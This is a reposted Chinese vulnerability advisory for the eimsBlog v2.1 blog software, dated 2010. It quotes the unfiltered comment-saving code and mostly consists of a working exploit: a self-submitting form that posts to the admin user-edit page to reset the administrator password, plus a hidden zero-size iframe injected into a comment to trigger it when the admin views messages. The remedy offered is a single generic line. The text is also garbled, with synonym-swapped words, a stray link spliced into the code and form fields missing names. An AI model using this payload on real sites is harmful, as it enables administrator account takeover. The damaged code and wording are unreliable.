eimsBlog_v2.1跨站漏洞及修复倡议[网络技术]
本文“eimsBlog_v2.1跨站漏洞及修复倡议[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
公布时间:2010-08-23
影响版本:eimsBlog_v2.1
公布作者:m4r10 http://www.bhst.org 转载请注明版权
漏洞解析:Article.asp
------------------------------------------------------------------------------
If Action = "Save" Then
If Session("CheckCode") <> Trim(Request.Form("Code")) Then WriteMsg("考证码错误")
Set Rs=Server.CreateObject("Adodb.RecordSet")
Rs.Open "Select * From [eims_GBook]",Conn,1,3
Rs.AddNew
Rs("TypeID") = ItemID
Rs("Name") = Trim(Request.Form("Name")) '未过滤留言者昵称
Rs("ItemNote") = Replace(Trim(Request.Form("ItemNote")),chr(10),"<br>") '未过滤留言内容
Rs("ItemAddDate") = Now()
Rs.Update
Rs.Close : Set Rs=Nothing
Response.Redirect "Article.asp?Item_blank" href="http://www.110hack.com/" >ItemID
Rs.Close:Set Rs=Nothing
End If
-------------------------------------------------------------------------------
由于留言评论内容直接插入更新语句,未举行任何过滤,招致XSS跨站漏洞
漏洞操纵:
首先拥有一个自己可控的网站,然后构造表单:
<html>
<form method="post"
action="http://目标URL/admin/UserEdit.asp?Action=Save&Itemname" value="admin">
<input value="123456789">
<input value="123456789">
</form>
<script>
document.form1.submit();
</script>
</html>
将以上代码保存为xxx.asp(文件名随便),并将其上传到自己的可控网站下面,得到你自己的URL地址
在随便一篇的文章评论在留言内容中插入:
<iframe src="http://你自己的URL地址/xss.asp" width=0 height=0></iframe>
此漏洞可触发当管理员登陆后台查看留言内容时直接改正管理员密码
危险等级:高
修复倡议:
加强对用户输入内容的查抄与考证,避免恶意者举行攻击
以上是“eimsBlog_v2.1跨站漏洞及修复倡议[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |